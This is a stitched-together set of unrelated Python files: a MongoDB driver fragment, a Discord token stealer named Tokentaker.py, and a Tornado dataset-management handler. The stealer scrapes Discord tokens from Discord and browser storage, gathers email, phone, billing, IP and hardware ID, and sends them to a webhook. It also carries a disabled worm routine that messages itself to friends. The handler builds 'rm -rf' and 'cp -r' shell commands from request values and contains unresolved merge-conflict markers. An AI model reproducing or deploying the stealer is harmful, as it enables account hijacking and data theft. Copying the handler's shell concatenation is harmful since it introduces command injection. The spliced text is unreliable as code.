cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR], collation=collation,
session=session, retryable_write=retryable_write)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
Tokentaker.py | import os
import time
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "Franco"
try:
dev = urlopen(Request("https://pastebin.com/raw/P857P8MT")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("_DISCORDWEBHOOK_", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8", errors = 'ignore' ) as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
Query.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Ivar Vargas Belizario
# Copyright (c) 2020
# E-mail: ivar@usp.br
import tornado.ioloop
import tornado.web
import tornado.httpserver
import threading
import ujson
import glob
import os
import pandas as pd
import numpy as np
import os.path
import math
import bcrypt
import uuid
import zipfile
import io
from io import BytesIO
from datetime import datetime
from bson.objectid import ObjectId
from vx.pgff.Settings import *
from vx.pgff.BaseHandler import *
from vx.pgff.MakeProjection import *
from vx.pgff.graphtree.gff import *
from vx.pgff.User import *
from vx.com.py.matrix.MData import *
from vx.com.py.database.MongoDB import *
class Query(BaseHandler):
#Get RequestHandler
def get(self):
        obj = ""
        app = DataTransfer(self.get_argument('data'))
        if app.argms["type"]==0:
            if app.argms["algorithm"]=="mst" or app.argms["algorithm"]=="nj":
                # 0:ok; 1:working; 2:error
                # lock dataset
                Query.setStatus(app, 1);
                t = threading.Thread(target=Query.processFeatures, args=(app,))
                t.start()
                obj = ujson.dumps(Query.getStatus(app));
        elif app.argms["type"]==4:
            # 0:ok; 1:working; 2:error
            # lock dataset
            Query.setStatus(app, 1);
            t = threading.Thread(target=Query.processInstances, args=(app,))
            t.start()
            obj = ujson.dumps(Query.getStatus(app));
elif app.argms["type"]==1:
obj = ujson.dumps(Query.listdatasets(self.current_user));
elif app.argms["type"]==2:
            obj = ujson.dumps(Query.loadatributenames(app));
        elif app.argms["type"]==3:
            obj = ujson.dumps(Query.getdatasetname(app));
# elif app.argms["type"]==4:
# obj = ujson.dumps(Query.savechangedashboard(app));
elif app.argms["type"]==5:
obj = ujson.dumps(Query.opencsv(app));
elif app.argms["type"]==6:
obj = ujson.dumps(Query.updatedatasetname(app));
elif app.argms["type"]==7:
obj = ujson.dumps(Query.clonedataset(app, self.current_user));
elif app.argms["type"]==8:
obj = ujson.dumps(Query.sharedataset(app));
elif app.argms["type"]==9:
obj = ujson.dumps(Query.unsharedataset(app));
elif app.argms["type"]==10:
            obj = ujson.dumps(Query.dropdataset(app.argms["file"]));
elif app.argms["type"]==11:
obj = ujson.dumps(User.changePassword(app, self.current_user));
elif app.argms["type"]==12:
obj = Query.downloaddataset(app, self.current_user, self);
elif app.argms["type"]==13:
obj = ujson.dumps(Query.silhouette(app));
        #elif app.argms["type"]==14:
        #    obj = Query.openfeature(app)
        #    obj = ujson.dumps(obj);
        #
        #elif app.argms["type"]==15:
        #    obj = Query.openinstance(app)
        #    obj = ujson.dumps(obj);
        #elif app.argms["type"]==16:
        #    obj = Query.export2dproj(app, self);
elif app.argms["type"]==17:
obj = Query.exportfeat2datafile(app, self);
elif app.argms["type"]==18:
obj = User.getUsers();
obj = ujson.dumps(obj);
elif app.argms["type"]==19:
obj = User.newUser(app.argms["data"]);
obj = ujson.dumps(obj);
elif app.argms["type"]==20:
obj = User.setAdmin(app.argms["data"]);
obj = ujson.dumps(obj);
        elif app.argms["type"]==21:
            obj = ujson.dumps(Query.makeInstancesLabels(app));
        elif app.argms["type"]==22:
            obj = ujson.dumps(Query.getUnselecteFeatures(app));
        elif app.argms["type"]==23:
            obj = ujson.dumps(Query.setListFeaturesChecks(app));
        elif app.argms["type"]==24:
            obj = ujson.dumps(Query.opendataset(app));
# self.write(ujson.dumps(obj))
self.write(obj)
self.finish()
#self.write(obj)
#Post RequestHandler
def post(self):
rs = ""
#print("data psotssssssssssssssss", self.get_argument('data'))
if self.current_user:
            app = DataTransfer(self.get_argument('data'))
#print("datdatdat",app.argms)
if app.argms["type"]==3:
app.argms["file"] = self.request.files['fileu'][0]
# obj.file = filed['body'].decode('utf-8')
rs = Query.uploadfiledata(app.argms, self.current_user);
self.write(rs)
    @staticmethod
    def converid(file):
        idin = file
        if Settings.MULIUSER == 1:
            idin = ObjectId(idin)
        return idin
    @staticmethod
    def processFeatures(app):
        try:
            ufe = Query.getUnselecteFeatures(app)
            g = Graph()
            g.make_graph(Settings.DATA_PATH, ufe, app.argms)
            app.argms["nodes"] = g.data["graph"]["nodes"];
            app.argms["ranking"] = g.data["ranking"];
            app.argms["rankingmin"] = g.data["rankingmin"];
            app.argms["rankingmax"] = g.data["rankingmax"];
            Query.savegraph(app,g.data);
            #resultr = Query.openfeature(app);
            #obj = ujson.dumps(resultr);
        except:
            # error dataset
            Query.setStatus(app, 2);
        else:
            # unlock dataset; "else" (not "finally") so the error status set
            # above is not immediately overwritten
            Query.setStatus(app, 0);
    @staticmethod
    def processInstances(app):
        try:
            dap = MakeProjection()
            dap.execute(app.argms);
            Query.saveprojection(app,dap.data);
        except:
            # error dataset
            Query.setStatus(app, 2);
        else:
            # unlock dataset; "else" so the error status survives
            Query.setStatus(app, 0);
    @staticmethod
    def makedir(ndir):
        if not os.path.exists(ndir):
            os.makedirs(ndir)
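    # A hedged sketch of the intended caller pattern (not part of this class):
    # type 0/4 requests above return immediately with the dataset status while
    # a background thread does the work, so a client is expected to poll until
    # the status clears. The statusopt codes (0 ok, 1 working, 2 error) follow
    # the comments above; the shape of Query.getStatus()'s result is assumed.
    #
    #   import time
    #   def wait_until_done(app, interval=1.0):
    #       while Query.getStatus(app)["statusopt"] == 1:
    #           time.sleep(interval)
    #       return Query.getStatus(app)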
# static query methods
@staticmethod
def listfiles(outdir, ext):
dires = []
fileso = []
for name in os.listdir(outdir):
dires.append(os.path.join(outdir, name))
if name.endswith(ext):
# fileso.append(str(os.path.join(outdir, str(name))))
fileso.append({"name":str(name)})
return fileso
@staticmethod
def listdirs(folder):
if os.path.exists(folder):
# listd = [d for d in os.listdir(folder) if os.path.isdir(os.path.join(folder, d))]
# for d in listd:
# if os.path.isdir(os.path.join(folder, d)):
# print("ddd",d)
return [d for d in os.listdir(folder) if os.path.isdir(os.path.join(folder, d))]
else:
return []
@staticmethod
def listdatasets(iduser):
rs = []
if Settings.MULIUSER == 0:
dir_list = Query.listdirs(Settings.DATA_PATH)
# print("dir_list", dir_list)
for di in dir_list:
# print(Settings.DATA_PATH, di)
ro = DBX.find(DBS.DBGFF, "data",{"_id": di})
for row in ro:
rs.append( {"_id":row["_id"],
"_id_user": "localuser",
"owner":"localuser",
"name":row["name"],
"dateupdate":row["dateupdate"],
"isshare":row["isshare"],
} )
elif Settings.MULIUSER == 1:
            iduser = iduser.decode("utf-8")
            dbs = list(MongoDB.aggregate(DBS.DBGFF, "data",
                [
                    {"$lookup":
                        {
                            "from": "user",
                            "localField": "_id_user",
                            "foreignField": "_id",
                            "as": "usersUnits",
                        }
                    },
                    {"$match": {
                        "$or": [
                            {"_id_user": ObjectId(iduser)},
                            {"isshare": 1}
                        ]
                    }
                    },
                    {"$project":
                        {
                            "_id": 1,
                            "_id_user": 1,
                            "name": 1,
                            "dateupdate": 1,
                            "isshare": 1,
                            "usersUnits._id": 1,
                            "usersUnits.name": 1,
                        }
                    },
                    {
                        "$sort": {
                            "dateupdate": -1
                        }
                    }
                ]
            ))
            for row in dbs:
                rs.append( {"_id":str(row["_id"]),
                            "_id_user_query": str(iduser),
                            "_id_user": str(row["_id_user"]),
                            "owner":row["usersUnits"][0]["name"],
"name":row["name"],
"dateupdate":row["dateupdate"],
"isshare":row["isshare"],
} )
return rs
@staticmethod
    def loadatributenames(app):
        idin = Query.converid(app.argms["file"])
        columns = []
        da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
        for d in da:
            if "fenames" in d and len(d["fenames"])>0:
                columns = d["fenames"]
            else:
                f = open(Settings.DATA_PATH+app.argms["file"]+"/transform.csv", "r")
                columns = f.readline().split(",")
                columns = [x.strip() for x in columns]
                f.close()
                columns_aux = []
                for col in columns:
                    #if col != "INDEXIDUID_":
                    columns_aux.append(col)
                columns = columns_aux
                DBX.update( DBS.DBGFF, "data",
                    {"_id": idin},
                    {"fenames":columns})
return columns
@staticmethod
def uploadfiledata(argms, iduser):
        r = """<script>
        parent.mwalert('','Error: upload file');
        parent.opendatsetparser();
        </script>"""
# if Settings.MULIUSER == 0:
if Settings.MULIUSER == 1:
iduser = ObjectId(iduser.decode("utf-8"))
        #print("iduser",iduser.decode("utf-8"));
        path = Settings.DATA_PATH
        o_fname, ext = os.path.splitext(argms["file"]['filename'])
        ext = ext.lower()
        dt_string = Query.now()
        if ext == ".csv" or ext == ".zip":
            rowdata = {
                "fenames": [],
"name": o_fname,
"type": ext,
"configfeature": {},
"typefeature": "",
"layoutfeature": "",
"versionfeature": Settings.VERSION,
                "featurecheck": [],
"configinstance": {},
"typeinstance": "",
"layoutinstance": "",
"versioninstance": Settings.VERSION,
"datecreate": dt_string,
"dateupdate": dt_string,
"hasupdate": 0,
"isshare": 0,
                "statusopt": 0,
                "statusval": "",
                "_id_user":iduser,
            };
            idin = None
            try:
                #if True:
                idin = DBX.insert(DBS.DBGFF, "data", rowdata)
                idin = str(idin)
                idin = Query.converid(idin)
                da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
                for d in da:
                    if ext == ".csv":
                        # save file
                        Query.savefile(path, str(idin), argms["file"]['body'])
                    elif ext == ".zip":
                        z = zipfile.ZipFile(io.BytesIO(argms["file"]['body']))
                        data = z.read(z.infolist()[0])
                        Query.savefile(path, str(idin), data)
                r = "<script>parent.opendatsetparser();</script>"
            except:
                # if idin!=None:
                Query.dropdataset(str(idin))
            """
            elif ext == ".data":
# save file
n_fname = idin;
n_fname_dir = path+n_fname;
filename_o = n_fname_dir+"/original.data";
filename_t = n_fname_dir+"/transform.csv";
#create directory
if not os.path.exists(n_fname_dir):
os.makedirs(n_fname_dir)
#create original csv file
output_file = open(filename_o, 'wb')
output_file.write(argms["file"]['body'])
output_file.close()
argms["file"] = "";
#read data original.csv and save
MData.converdata2csv(filename_o, filename_t)
<<<<<<< HEAD
return r
@staticmethod
def getdatasetname(argms):
idin = argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
"""
return r
@staticmethod
def savefile(path, n_fname, data):
#n_fname = idin;
n_fname_dir = path+n_fname;
filename_o = n_fname_dir+"/original.csv";
filename_t = n_fname_dir+"/transform.csv";
#create directory
Query.makedir(n_fname_dir)
#create original csv file
output_file = open(filename_o, 'wb')
output_file.write(data)
output_file.close()
#argms["file"] = "";
#save transform csv file
df = pd.read_csv(filename_o, delimiter=",")
cat_columns = df.select_dtypes(['object']).columns
df[cat_columns] = df[cat_columns].astype('category')
for col in cat_columns:
df[col] = df[col].cat.codes
df.to_csv(filename_t, index=False)
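# Illustrative example (not from the original source): a text column such as
# ["red", "green", "red"] ends up in transform.csv as its category codes
# [1, 0, 1], so every feature in the transformed file is numeric.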
@staticmethod
def getdatasetname(app):
idin = Query.converid(app.argms["file"])
re = ""
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
re = d["name"];
return re
@staticmethod
def setListFeaturesChecks(app):
idin = Query.converid(app.argms["file"])
feidlist = app.argms["data"]
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
featurecheck = []
if "featurecheck" in d and len(d["featurecheck"])>0:
featurecheck = d["featurecheck"]
else:
cols = Query.loadatributenames(app)
if len(cols)>0:
featurecheck = [1 for i in range(len(cols))]
for i, v in feidlist:
featurecheck[i] = v
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"featurecheck":featurecheck})
rs = {"statusopt":0, "statusval":"", "response":{}}
return rs
@staticmethod
def getUnselecteFeatures(app):
result = []
idin = Query.converid(app.argms["file"])
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
if "featurecheck" in d and len(d["featurecheck"])>0:
featurecheck = d["featurecheck"]
for i in range(len(featurecheck)):
if featurecheck[i] == 0:
result.append(i);
else:
cols = Query.loadatributenames(app)
if len(cols)>0:
featurecheck = [1 for i in range(len(cols))]
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"featurecheck":featurecheck})
#print("result", result)
return result;
@staticmethod
def opencsv(app):
filefe = Settings.DATA_PATH+app.argms["file"]+"/transform.csv"
df = pd.read_csv(filefe)
#print (df)
return {"response":1};
@staticmethod
def updatedatasetname(app):
idin = Query.converid(app.argms["file"])
nname = app.argms["newname"]
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"name":nname})
return {"response":1};
@staticmethod
def clonedataset(app, iduser):
idin = Query.converid(app.argms["file"])
iduser = Query.converid(iduser.decode("utf-8"))
#print("iduser", iduser)
dat = list(DBX.find(DBS.DBGFF,"data", {"_id": idin}))
datc = {}
for row in dat:
for k, v in row.items():
if k != "_id":
datc[k] = v
dt_string = Query.now();
datc["name"] += " (clone)";
datc["datecreate"] = dt_string;
datc["dateupdate"] = dt_string;
datc["_id_user"] = iduser;
#datc["_id"] = DBFile.uid();
idinsert = DBX.insert(DBS.DBGFF, "data", datc)
idinsert = str(idinsert)
ndir = Settings.DATA_PATH+idinsert
Query.makedir(ndir)
os.popen("cp -r "+Settings.DATA_PATH+str(idin)+"/* "+ndir)
return {"response":1};
@staticmethod
def downloaddataset(app, iduser, selft):
idin = Query.converid(app.argms["file"])
zipname="download.zip"
zipb = ""
dat = list(DBX.find( DBS.DBGFF,"data", {"_id": idin}))
for row in dat:
zipname=row["name"]+".zip";
f = BytesIO();
dirpath = Settings.DATA_PATH+str(idin)
fzip = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
basedir = os.path.dirname(dirpath) + '/'
for root, dirs, files in os.walk(dirpath):
if os.path.basename(root)[0] == '.':
continue
# dirname = root.replace(basedir, '')
dirname = root.replace(basedir, '')
dirname = dirname.replace(str(idin), '')
# print(dirname, basedir)
# dirname = root
for fi in files:
if fi[-1] == '~' or (fi[0] == '.' and fi != '.htaccess'):
continue
fzip.write(root + '/' + fi, dirname + '/' + fi)
selft.set_header('Content-Type', 'application/zip')
selft.set_header("Content-Disposition", "attachment; filename=%s" % zipname)
fzip.close()
zipb = f.getvalue()
f.close()
return zipb;
@staticmethod
def setStatus(app, k):
if "file" in app.argms and app.argms["file"]!="" and "statusval" in app.argms and app.argms["statusval"]!="":
idin = Query.converid(app.argms["file"])
statusval = app.argms["statusval"]
DBX.update(DBS.DBGFF, "data",
{"_id": idin},
{"statusopt": k, "statusval": statusval})
@staticmethod
def getStatus(app):
idin = Query.converid(app.argms["file"])
status = {"statusopt":0, "statusval":app.argms["statusval"], "response":{}}
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
for r in re:
if "statusopt" in r and "statusopt" in r:
status["statusopt"] = r["statusopt"]
status["statusval"] = r["statusval"]
else:
DBX.update(DBS.DBGFF, "data",
{"_id": idin}, {"statusopt":0, "statusval":""})
return status
@staticmethod
def sharedataset(app):
idin = app.argms["file"]
MongoDB.update( DBS.DBGFF, "data",
{"_id": ObjectId(idin)},
{"isshare":1 }
)
return {"response":1};
@staticmethod
def unsharedataset(app):
idin = app.argms["file"]
MongoDB.update( DBS.DBGFF, "data",
{"_id": ObjectId(idin)},
{"isshare":0 }
)
return {"response":1};
@staticmethod
def dropdataset(idin):
filefe = Settings.DATA_PATH+str(idin)
os.system("rm -rf "+filefe)
if Settings.MULIUSER == 1:
MongoDB.delete(DBS.DBGFF, "data", {"_id": ObjectId(idin)})
r = "<script>parent.opendatsetparser();</script>"
return {"response":r};
@staticmethod
def savegraph(app,p):
idin = Query.converid(app.argms["file"])
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
for r in re:
# config = app.argms
# if "config" in r and "projection" in r["config"]:
# config["projection"] = r["config"]["projection"]
# MongoDB.update(DBS.DBGFF, "data",
# {"_id":ObjectId(idin)}, {"config":config})
dataup = {
"versionfeature":Settings.VERSION,
"typefeature":"graph",
"configfeature":app.argms,
"layoutfeature":"feature.obj",
"dateupdate": Query.now(),
}
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
# dataup = {}
# if "configinstance" in r:
# dataup = r["configinstance"];
# dataup["ranking"] = app.argms["ranking"]
# else:
# dataup = app.argms
# dataupx = {"configinstance":dataup}
# MongoDB.update(DBS.DBGFF, "data",
# {"_id":ObjectId(idin)}, dataupx)
filename = Settings.DATA_PATH+str(idin)+"/feature.obj"
with open(filename,'w') as fp:
ujson.dump(p, fp)
@staticmethod
def saveprojection(app,p):
idin = Query.converid(app.argms["file"])
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
for r in re:
if "configfeature" in r:
config = r["configfeature"]
config["projection"] = app.argms["projection"]
config["instanceproximity"] = app.argms["instanceproximity"]
config["target"] = app.argms["target"]
config["intarget"] = app.argms["intarget"]
config["featureselected"] = app.argms["featureselected"]
config["idinstanceslabels"] = app.argms["idinstanceslabels"];
#config["ranking"] = app.argms["ranking"]
dataup = {"configfeature":config};
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
#print("r[configfeature]", r["configfeature"])
app.argms["ranking"] = r["configfeature"]["ranking"];
app.argms["nodes"] = r["configfeature"]["nodes"];
dataup = {
"versioninstance":Settings.VERSION,
"typeinstance":"projection",
"configinstance":app.argms,
"layoutinstance":"instance.obj",
"dateupdate": Query.now(),
}
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
# typefeature":"graph", "configfeature
filename = Settings.DATA_PATH+str(idin)+"/instance.obj"
with open(filename,'w') as fp:
ujson.dump(p, fp)
@staticmethod
def silhouette(app):
idin = Query.converid(app.argms["file"])
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
si = 0.0
for r in re:
if "typeinstance" in r and r["typeinstance"]=="projection":
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
if os.path.exists(filen):
data = {}
try:
infil = open(filen, "r")
data = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
data = {}
# finally:
# data = {}
if "points" in data:
config = {}
if "configinstance" in r:
config =r["configinstance"]
pp = data["points"]
#print(pp)
X, y, z = [],[],{}
for p in pp:
X.append([p["x"], p["y"]])
y.append(p["t"])
z[p["t"]]=1
si = Metrics.compute_silhoute(X,y,len(z));
config["silhouette"] = si;
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, {"configinstance":config})
return si;
@staticmethod
def makeInstancesLabels(app):
idin = Query.converid(app.argms["file"])
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
#print("RE", re)
for r in re:
config = {}
if "configinstance" in r:
config = r["configinstance"]
config["idinstanceslabels"] = app.argms["idinstanceslabels"];
dataup = {"configinstance":config};
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
config = {}
if "configfeature" in r:
config = r["configfeature"]
config["idinstanceslabels"] = app.argms["idinstanceslabels"];
dataup = {"configfeature":config};
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
#print("REu", app.argms["colname"], re)
df = pd.read_csv( Settings.DATA_PATH+str(idin)+"/original.csv",
delimiter=",",
usecols=[app.argms["idinstanceslabels"]])
#rest = {}
#rest["instanceslabels"] = [ str(df[app.argms["colname"]][ind]) for ind in df.index]
#rest["idinstanceslabels"] = [ str(row[0]) for row in df.itertuples(index=False) ]
rest = [ str(row[0]) for row in df.itertuples(index=False) ]
#print (rest)
del df
del re
return rest;
"""
@staticmethod
def export2dproj(app,selft):
idin = Query.converid(app.argms["file"])
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
export = ""
name = ""
for r in re:
name = r["name"]
if "typeinstance" in r and r["typeinstance"]=="projection":
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
if os.path.exists(filen):
data = {}
try:
infil = open(filen, "r")
data = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
data = {}
# finally:
# data = {}
if "points" in data:
pp = data["points"]
export = "DY\n"
export += str(len(pp))+"\n"
export += "2\n"
export += "x;y\n"
for p in pp:
export += "{};{:.6f};{:.6f};{:.1f}\n".format(p["id"],p["x"], p["y"], p["t"])
selft.set_header('Content-Type', 'text/plain')
selft.set_header("Content-Disposition", "attachment; filename=%s" % name+".prj")
return export;
"""
@staticmethod
def opendataset(app):
idin = Query.converid(app.argms["file"])
colle = app.argms["data"]["collect"]
query = app.argms["data"]["query"]
statusval, statusval = 0, ""
rf = []
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
rs = {};
for r in re:
if "statusopt" in r and "statusval" in r:
statusopt, statusval = r["statusopt"], r["statusval"]
else:
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"statusopt": 0, "statusval": ""})
statusopt, statusval = 0, ""
if statusopt==0:
r["_id"] = str(r["_id"])
r["_id_user"] = str(r["_id_user"])
rs = r
rs["fenames"] = Query.loadatributenames(app)
rs["lastversion"] = Settings.VERSION
if colle=="features":
# open features
filen = Settings.DATA_PATH+str(idin)+"/feature.obj"
rs["layoutfeature"] = DBFile.openFile(filen)
elif colle=="instances":
# open instances
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
rs["layoutinstance"] = DBFile.openFile(filen)
#filter
for qrow in query:
aux = rs
for k in qrow:
if k in aux:
aux = aux[k]
else:
aux = {}
break;
rf.append({"query":qrow, "response":aux})
return {"statusopt": statusopt, "statusval": statusval, "response":rf}
"""
@staticmethod
def openfeature(app):
idin = app.argms["file"]
cols = Query.loadatributenames(app.argms)
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
rs = {};
for r in re:
r["_id"] = str(r["_id"])
r["_id_user"] = str(r["_id_user"])
rs = r
rs["fenames"] = cols
rs["lastversion"] = Settings.VERSION
filen = Settings.DATA_PATH+str(idin)+"/feature.obj"
dfile = {}
if os.path.exists(filen):
try:
infil = open(filen, "r")
dfile = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
dfile = {}
rs["layoutfeature"] = dfile
return rs;
@staticmethod
def openinstance(app):
idin = app.argms["file"]
#cols = Query.loadatributenames(app.argms)
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
rs = {};
for r in re:
r["_id"] = str(r["_id"])
r["_id_user"] = str(r["_id_user"])
rs = r
#rs["fenames"] = cols
rs["lastversion"] = Settings.VERSION
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
dfile = {}
if os.path.exists(filen):
try:
infil = open(filen, "r")
dfile = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
dfile = {}
rs["layoutinstance"] = dfile
return rs;
"""
@staticmethod
def exportfeat2datafile(app, selft):
idin = Query.converid(app.argms["file"])
filename = Settings.DATA_PATH+str(idin)+"/transform.csv"
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
export = ""
name = ""
for r in re:
name = r["name"]
fnames = Query.loadatributenames(app);
fnamesindex ={ str(fnames[i]):i for i in range(len(fnames))}
layoutfeature = DBFile.openFile(Settings.DATA_PATH+str(idin)+"/feature.obj")
#print("layoutfeature", layoutfeature)
nodes = layoutfeature["graph"]["nodes"]
#print("nodes", nodes, fnamesindex, fnames)
X = DataMatrix(filename)
columns = X.columns()
colsindexes = X.columnsindexes()
XT = X.transpose()
del X
#print("fnames", fnames )
#print("nodesXX", fnamesindex )
export = "DY\n"
